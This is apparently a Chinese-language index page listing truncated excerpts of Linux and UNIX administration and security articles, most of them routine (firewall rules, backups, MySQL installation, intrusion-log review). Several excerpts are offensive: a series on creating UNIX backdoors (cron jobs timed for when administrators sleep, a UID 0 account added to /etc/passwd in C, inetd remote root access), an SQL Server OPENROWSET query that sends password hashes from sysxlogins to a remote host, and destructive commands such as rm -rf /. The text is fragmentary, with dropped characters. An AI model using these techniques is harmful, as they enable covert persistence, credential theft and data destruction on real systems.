浅谈linux操作系统的优化及安全
在网上看到不少有关linux优化方面好文章在此我也不赘述这些文章了我只想从我自己体会来谈谈这方面问题 作为个系统管理员我下面说都是基于服务器应用linux来谈由于个人电脑上使用linux也许不是像服务器上样优先追求安全和稳定因此个人电脑使用朋友只做个参考吧 本文提及系统如没有特别声明均采用redhat公司redhat linux系统 有关优化 说起优化其实最好优化就... [阅读全文]
创建UNIX后门(高级篇)
Crontab 对于系统管理员来说是非常有用Cron 服务用于计划在特定时间(月、日、周、时、分)运行如果你足够聪明就应该加以利用使的为我们制造“后门”!通过 Cron 服务你可以让它在每天凌晨 2:00 (这个时候网管应该睡觉了吧)运行后门使你能够轻易进入系统干你想干事并在网管起来的前退出系统根用户 crontab 文件放在 /var/spool/crontab/root 中其格式如下:... [阅读全文]
Unix系统的攻击和防范
这篇文章主要针对些对网络安全感兴趣、同时又还不如何熟悉Unix入侵和防范朋友们而写篇文章本文循序渐进地介绍了黑客攻击Unix主机主要思路方法和系统管理员如何针对这些思路方法进行有效防御等 §.Unix特点 Unix能流行起来绝对不是偶然这跟Unix本身特点的突出是分不开特点那就是:1、极强可移植性;2、启动异步进程能力;3、致文件、设备和进程间I/O;5、层次化文件系统;6、可... [阅读全文]
创建UNIX后门(初级篇)
最简单思路方法就是在口令文件 passwd 中增加个 UID 为 0 帐号但最好别这么做只要系统管理员检查口令文件就会“漏馅”了以下是在 /etc/passwd 口令文件中添加个 UID 0 帐号C backdoor/backdoor1.c # { FILE *fd; fd=fopen("/etc/passwd","a+"); fprf(fd,... [阅读全文]
创建UNIX后门(中级篇)
超级服务器守护进程(inetd)配置文件系统管理员般情况下不经常检查该文件因此这倒是个放置“后门”好地方:) 那么在这里如何建立个最好后门呢?当然是远程了这样你就不必需要本地帐号就可以成为根用户了首先让我们先来了解下这方面基础知识:inetd 进程负责监听各个TCP和UDP端口连接请求并根据连接请求启动相应服务器进程该配置文件 /etc/inetd.conf 很简单基本形式如下: (... [阅读全文]
编译内核模块:应用程序和内核模块的比较
表 应用和内核模块比较 C语言应用 内核模块 使用 Libc库 内核 运行空间 用户空间 内核空间 运行权限 普通用户 超级用户 入口 module_init 出口 exit module_exit 编译 Gcc –c Makefile 连接 Gcc insmod 运行 直接运行 insmod 调试 Gdb kdbug, kdb,kgdb等 从表我们可以看出内核模块不能l... [阅读全文]
linux系统忘记密码:linux系统密码忘记后的5种思路方法
如果你既没做系统启动软盘同时多系统引导LILO 和GRUB 又被删除那么只能使用Linux 系统安装盘来恢复root密码步骤如下 . lilo引导 1. 在出现 lilo: 提示时键入 linux single Boot: linux single 2. 回车可直接进入linux单用户模式3. vi /etc/passwd 删除root项中密码 (这里也可以直接使用passwd命令重新... [阅读全文]
linux服务器维护:Linux服务器维护的 4大法宝
Linux 服务器虽然相对来说比Windwos服务器要稳定和安全但是工欲善其事必先利其器稳定安全Linux服务器仍然离不开合理及时维护工作对于Linux服务器系统维护窍门技巧有很多这里就先给大家几个锦囊妙计 、让软件Software包保持最新版本 Linux服务器软件Software包也如同Windwos操作系统补丁样在不断升级Linux服务器软件Software升级主要有两个目是增强软件So... [阅读全文]
处理Linux内核安全详解
对于电脑用户来说Windows强大功能服务了广大用户 不过Windows安全问题还是让很多人头疼所以很多人开始应用Linux不过Linux内核安全也不知大疏忽今天就讲讲Linux内核安全问题清理 Windows安全问题比谷仓里跳蚤还要多但Linux也未必就对自身安全漏洞免疫最近有两个明显bug被发现不过很快就修好了为了保证你不受困扰你需要尽快地为你内核打上补丁 修复列表上第个bug是个远程DD... [阅读全文]
Linux操作系统防火墙设置思路方法
修改防火墙配置需要修改 /etc/sysconfig/iptables 这个文件如果要开放哪个端口在里面添加条 -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 1521 -j ACCEPT 就可以了其中 1521 是要开放端口号然后重新启动Linux防火墙服务 停止/启动防火墙服务命令: 用root登录后执... [阅读全文]
sql旁注程序:珍藏版的SQL旁注精华程序
珍藏版SQL旁注精华 珍藏版SQL旁注精华代码如下:以下是引用片段:insert o OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from _sysxlogins’) select * from database.dbo.sysxlo... [阅读全文]
Linux操作系统管理窍门技巧大荟萃
推荐:Linux操作系统管理窍门技巧大荟萃 作为桌面操作系统Linux人机界面可真是不敢恭维但是作为网络操作系统其易用性(对于NOS而言)和高性能恐怕是很难有能出其右当然这并不是说它操作很简单而是说若能掌握些窍门技巧无论是系统设置还是网络管理都能变得轻松自如、随心所欲 禁止终端模式下显示器自动节能 大部分PC上安装Linux后在终端模式下也能实现自动关闭显示器功能但是假如我们要在显示器上即时... [阅读全文]
Linux操作系统下安装QQ最简单的思路方法
我深深知道许多初学者进入LINUX那刻起马上想到就就是安装上QQ看来马化腾QQ比LINUX更有吸引力呀他们为什么不出个官方版LINUX QQ呢!建议大家给他发邮件省得我们那么麻烦好了废话不说了初学者装QQ遇到问题太多而对于初学者来说最主要是装上能用就行了不要装个QQ也这么麻烦那就被LINUX吓跑了所以本文我只给大家介绍LUMAQQ最简单安装思路方法: 先去下载咯:http://lumaqq.li... [阅读全文]
backtracklinux:使用BackTrack检查Linux安全漏洞
无论你是否用过Bastille UNIX工具以便手动加固你Linux系统或者只是想对目前系统状态进行快 照你需要使用BackTrack这是款基于Slackware Linux版本通过启动CD或虚拟机镜像(VMI)运行在 官方第 3个版本(如果你计算最新发布就是第 4版)BackTrack含有方便安全工具用于检测Linux 系统里漏洞本着“黑客入侵”精神BackTrack集成这种通常安全测试思路方法... [阅读全文]
介绍UNIX高手的十大习惯
当您经常使用某个系统时往往会陷入某种固定使用模式有时您没有养成以尽可能最好方式做事习惯有时您不良习惯甚至会导致出现混乱纠正此类缺点最佳思路方法的就是有意识地采用抵制这些坏习惯好习惯本文提出了 10 个值得采用 UNIX 命令行习惯——帮助您克服许多常见使用怪癖并在该过程中提高命令行工作效率好习惯下面列出了这 10 个好习惯的后对进行了更详细描述 在单个命令中创建目录树 清单 1 演示了最常见 ... [阅读全文]
windows下linux:linux下破解windows密码
随便google下你就会发现windowsxp提升权限思路方法N多但是大多数是无效而铺天盖地文章也只是不负责任抄来抄去: 1.最著名删除SAM文件正常情况下你是没有办法动这个文件当你化大力气删掉这个文件后会发现系统会崩溃汗下吧… 2.进入带命令行安全模式执行net user admin 123 /add 类似命令sorry 首先普通用户要进入安全模式就是管理员话微软就别混那么多年了;其次普通用... [阅读全文]
熟知Linux操作系统紧急情况处理思路方法
急救盘组(也称为boot/root盘组)是系统管理员必不可少工具用它可以独立地启动和运行个完整Linux系统实际上急救盘组中第2张盘上就有个完整Linux系统包括root文件系统;而第1张盘则存放了可启动内核使用急救盘组维护系统很简单只需用这两张盘启动系统后进入急救模式这时使用是root账户为了能访问硬盘上文件需要手工安装硬盘文件系统例如用下面命令可在/mnt目录中安装/dev/hda2盘上ext... [阅读全文]
dnf秒杀外挂:7条秒杀LINUX的命令
如果您使用Linux,可千万要记得不要让傻孩子们敲入以下命令,尽管这些命令看上去相当复杂,但还是会对你系统造成严重影响.有些会影响你和系统运行,有些会直接把你盘抹掉,这些命令几乎没有什么可以挽回余地.1. Code:rm -rf /这个很简单,根目录会被擦光.2. Code:char esp __attribute__ ((section(".text"))) /* e.s.prelease */... [阅读全文]
linux安全方法:Linux安全检查思路方法
检查系统密码文件,查看文件修改日期[root@fedora ~]# ls -l /etc/passwd查看passwd文件中有哪些特权用户[root@fedora ~]# awk -F: '$3= =0 {pr $1}' /etc/passwd查看系统里有没有空口令帐户awk -F: 'length($2)= =0 {pr $1}' /etc/shadow检查系统守护进程cat /etc/inet... [阅读全文]
telnet远程登录linux:Telnet远程登录Linux主机
利用远程登录协议来远程登录并对服务器进行管理这是服务器管理员最司空见惯操作了在 Windows操作环境中系统管理员可能喜欢采用Telnet协议来完成这个任务但是在Linux操作系统 环境中要利用这个Telnet协议话具有定困难由于Telnet协议有定安全漏洞 所以Linux操作系统默认情况下是采用ssh远程登录协议来代替这个Telnet协议不过有些系统管理 员还是喜欢采用Telnet协议如要通过W... [阅读全文]
了解Linux操作系统紧急情况处理思路方法
急救盘组(也称为boot/root盘组)是系统管理员必不可少工具用它可以独立地启动和运行个完整Linux系统实际上急救盘组中第2张盘上就有个完整Linux系统包括root文件系统;而第1张盘则存放了可启动内核 使用急救盘组维护系统很简单只需用这两张盘启动系统后进入急救模式这时使用是root账户 为了能访问硬盘上文件需要手工安装硬盘文件系统例如用下面命令可在/mnt目录中安装/dev/hda2盘... [阅读全文]
查核入侵日志:怎样查核遭受入侵系统的日志
在UNIX系统遭受入侵后确定损失及入侵者攻击源地址相当重要虽然在大多数入侵者懂得使用曾被攻陷计算机作为跳板来攻击你服务器但是他们发动正式攻击前所做目标信息收集工作(试探性扫描)常常是从他们工作计算机开始下面介绍如何从遭受入侵系统日志中分析出入侵者IP并加以确定 1. messages /var/adm是UNIX日志目录(Linux下则是/var/log)其中有相当多ASCII格式日志文... [阅读全文]
linux下安装软件:linux下安装mysql
linux下安装mysql 、引言 想使用Linux已经很长时间了由于没有硬性任务直也没有系统学习近日由于工作需要必须使用Linux下MySQL本以为有 Windows下使用SQL Server经验觉得在Linux下安装MySql应该是易如反掌事可在真正安装和使用MySQL时走了很多弯路遇见 很多问题毕竟Linux 和Windows本身就有很大区别为了让和我样初学者在学习过... [阅读全文]
误删除恢复软件:恢复被误删除的Linux文件
作为个多用户、多任务操作系统Linux下文件旦被删除是难以恢复尽管删除命令只是在文件节点中作删除标记并不真正清除文件内容但是其他用户和些有写盘动作进程会很快覆盖这些数据 1、Ext2文件系统结构简单介绍 在Linux所用Ext2文件系统中文件是以块为单位存储默认情况下每个块大小是1K区别块以块号区分每个文件还有个节点节点中包含有文件所有者读写权限文件类型等信息对于个小于12个块文件在节... [阅读全文]
linux备份工具:Linux自动备份
1. 利用工具:rsyncssh 2. 特点: l检查原文件并只复制发生变化数据块 l使用ssh加密数据 l允许传输前压缩 l 从源系统移除数据时在目标系统上自动移除 l允许设置WAN连接数据传输速度 l具有复制设备文件能力 3. Ssh服务器和客户端设置为了实现自动双向验证我们通过公钥验证这里用root来连接服务器首先更改ssh服务器ssh服务配置文件/etc/ssh/sshd_... [阅读全文]
linux查看系统版本:Linux系统信息查看小命令
系统 # uname -a #查看内核/操作系统/CPU信息 # head -n 1 /etc/issue #查看操作系统版本 # cat /proc/cpuinfo #查看CPU信息 # hostname #查看计算机名 # lspci -tv #列出所有PCI设备 # lsusb -tv #列出所有USB设备 # lsmod #列出加载内核模块 # env #查看环境变量 资... [阅读全文]
linux远程桌面控制:Linux下进行windows远程桌面连接(3389)
好久没有更新博客了主要是过年和过了年的后找房子问题现在解决了来透透气现在用Fedora10昨天忽然突发奇想来看看我那几个服务器如何样了然后就搜了下解决了在linux下连接windows 3389 问题没啥技术含量给大家分享下吧1首先去 http://www.rdesktop.org/ 下载个 rdesktop 然后 make ,make 安装下当然在fedora中直接 yum rdesktop... [阅读全文]
系统安全:Linux操作系统防范攻击的一些实用窍门技巧
Linux是个多用户系统旦人家取得你root用户的后他就可以在你系统上为所欲为了由于单用户对系统有完全控制权限如果操作不当或被他人进入那么后果将不堪设想如何防止入行单用户了有以下几个注意方面 1、对/etc/inittab文件进行保护如果把id:3:initdefault中3改为成1就可以每次启动直接进入到单用户方式对/etc/inittab文件以root身份进入通过chown 700 /e... [阅读全文]
unixps命令:UNIX常用命令
UNIX常用命令很多最基本我们就不说了这里我用例子来介绍说明些命令使用窍门技巧: 注://为注释内容. .ls特殊使用方法 .Grep命令使用方法 .Alias使用方法 .Find命令使用方法 .Cut命令使用方法 .改变unix提示符 .为环境变量增加新PATH路径(不影响老路径) .列举和某个主题相关所有unix命令 .查看unix版本号 .UNIX下整个目录拷贝 .U... [阅读全文]
UNIX 高手的另外10个习惯
=atitle引言当 您经常使用某个系统时往往会陷入某种固定使用模式有时您没有养成以尽可能最好方式做事习惯有时您不良习惯甚至会导致出现混乱纠正此类 缺点最佳思路方法的就是有意识地采用抵制这些坏习惯好习惯本文提出了 10 个值得采用 UNIX 命令行习惯——帮助您克服许多常见使用怪癖并在该过程中提高命令行工作效率好习惯下面列出了这 10 个好习惯的后对进行了更详细描述=atitle采用 10 个好习... [阅读全文]
